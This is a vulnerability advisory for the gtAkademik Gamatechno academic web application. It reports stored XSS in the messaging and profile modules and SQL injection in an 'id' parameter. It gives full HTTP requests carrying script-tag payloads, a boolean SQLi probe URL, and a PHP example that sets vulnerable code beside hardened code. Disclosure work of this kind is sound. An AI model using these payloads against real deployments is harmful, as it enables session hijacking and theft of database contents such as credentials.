gtAkademik Gamatechno: SQL Injection and Persistent XSS
We discovered that the gtAkademik Gamatechno web application is susceptible to SQL Injection and Cross-site Scripting (XSS).
Stored/Persistent XSS
The web application allows an attacker to inject an XSS payload that is stored in the database, because there is no sanitization process. Two modules are affected by XSS: the Message Module and the Update Profile Module.
Persistent XSS in Message Module
This module is used for internal messaging inside gtAkademik. We were able to send an XSS-crafted message to other users, for example to the administrator user.
POST /index.php?pModule=zsinppiZmQ==&pSub=zsinppiZmQ==&pAct=0dWjlpylpw== HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://1.1.1.1/index.php?pModule=zsinppiZmQ==&pSub=xNKho6almcWem9isk5uW&pAct=18yZqg==
Cookie: PHPSESSID=XXXXXXXXXXXXXXXXXXXXXXX
Content-Type: application/x-www-form-urlencoded
Content-Length: 169

data[MessageSender]=XXXXXXXXXX&data[MessageReceiver]=XXXXXXXXXX&data[MessageTitle]=<script>&data[MessageContent]=<script>alert("XSS");</script>act=doCompose&compBtn=Kirim
Persistent XSS in User Profile Module (save the user profile)
This module is used to update user profiles. We were able to inject XSS into it and save the data to the database. As a result, anyone who views any profile is exposed to the XSS attack.
POST /index.php?pModule=1taZpQ==&pSub=0dWjmaCemQ==&pAct=xsedpw== HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://1.1.1.1/index.php?pModule=1taZpQ==&pSub=0dWjmaCemQ==&pAct=xsedpw==&sia=ydeoo3FhY5dibpNyaWJilWdqY2RhqsrPmM6Xy5+hoKfOzGOjpqSox52V2J6kqprHnqxfnaCbxtpl1p3YqpuVnY/TnKM=
Cookie: PHPSESSID=XXXXXXXXXXXXXXXXXXXXXXX
Content-Type: application/x-www-form-urlencoded
Content-Length: 213

tanggal=02/08/1988&alamat_asal=XXXXXXXXXX&alamat=<script>alert("XSS");</script>&no_hp_mhs=XXXXXXXXXX&nama_ayah=&nama_ibu=&alamat_ortu=&no_telp_ortu=&simpan=Simpan
SQL Injection
The web application is also susceptible to SQL injection, because there is no sanitization process. This allows an attacker to extract contents from the database, uncovering a large amount of sensitive and important data, such as credentials.
The parameter ‘id’ is vulnerable to SQL Injection.
http://1.1.1.1/mod=transaksi_registrasi_pmb&sub=transaksi_detail&do=daftar&id=129000204' AND '1'='1
Impact
Malicious authenticated users can exploit this vulnerability to execute arbitrary script in the context of a logged-in user's session. Furthermore, malicious authenticated users may use the SQL injection vulnerability to execute arbitrary SQL queries, potentially viewing or modifying data in the backend database.
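The two defect classes behind this advisory, shown as an added PHP example (not gtAkademik code): request input concatenated into SQL and stored text rendered without encoding, each beside its usual fix. The table and column names and the in-memory SQLite database are assumptions.

```php
<?php
// Added example, not gtAkademik code: the two defect classes in this advisory
// (request input concatenated into SQL, stored text rendered without encoding)
// beside the usual fixes. Table and column names are assumptions.

// SQL injection, vulnerable: the 'id' parameter becomes part of the SQL text, so
// a value like  129000204' AND '1'='1  changes the statement rather than the data.
function findRegistrationUnsafe(PDO $db, string $id): ?array {
    $row = $db->query("SELECT * FROM registrasi_pmb WHERE id = '$id'")->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// SQL injection, hardened: a prepared statement binds the value separately from
// the SQL, so quotes and keywords inside it are matched literally, never parsed.
function findRegistrationSafe(PDO $db, string $id): ?array {
    $stmt = $db->prepare('SELECT * FROM registrasi_pmb WHERE id = :id');
    $stmt->execute([':id' => $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Stored XSS, vulnerable: message fields read back from the database are
// emitted verbatim, so markup saved by the sender runs in the reader's browser.
function renderMessageUnsafe(array $m): string {
    return '<h2>' . $m['title'] . '</h2><p>' . $m['content'] . '</p>';
}

// Stored XSS, hardened: every stored field is HTML-encoded at the point of output
// (storing the raw text is fine; the fix belongs where it is rendered).
function renderMessageSafe(array $m): string {
    $e = fn(string $s): string => htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<h2>' . $e($m['title']) . '</h2><p>' . $e($m['content']) . '</p>';
}

// Demonstration on an in-memory SQLite database with constructed sample rows.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE registrasi_pmb (id TEXT, nama TEXT)');
$db->exec("INSERT INTO registrasi_pmb VALUES ('129000204', 'Budi'), ('129000205', 'Siti')");

$injected = "129000204' AND '1'='1";   // the advisory's test value for 'id'
var_dump(findRegistrationUnsafe($db, $injected) !== null); // concatenation: the condition is parsed as SQL
var_dump(findRegistrationSafe($db, $injected) !== null);   // binding: no id equals the whole string

// A stored message whose content is the advisory's XSS probe (constructed row).
$msg = ['title' => 'hello', 'content' => '<script>alert("XSS");</script>'];
echo renderMessageUnsafe($msg), "\n";   // the script element reaches the browser as markup
echo renderMessageSafe($msg), "\n";     // the same text is shown literally, not executed
```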
Solution
At the time of writing, we are not aware of any update or patch available from the vendor.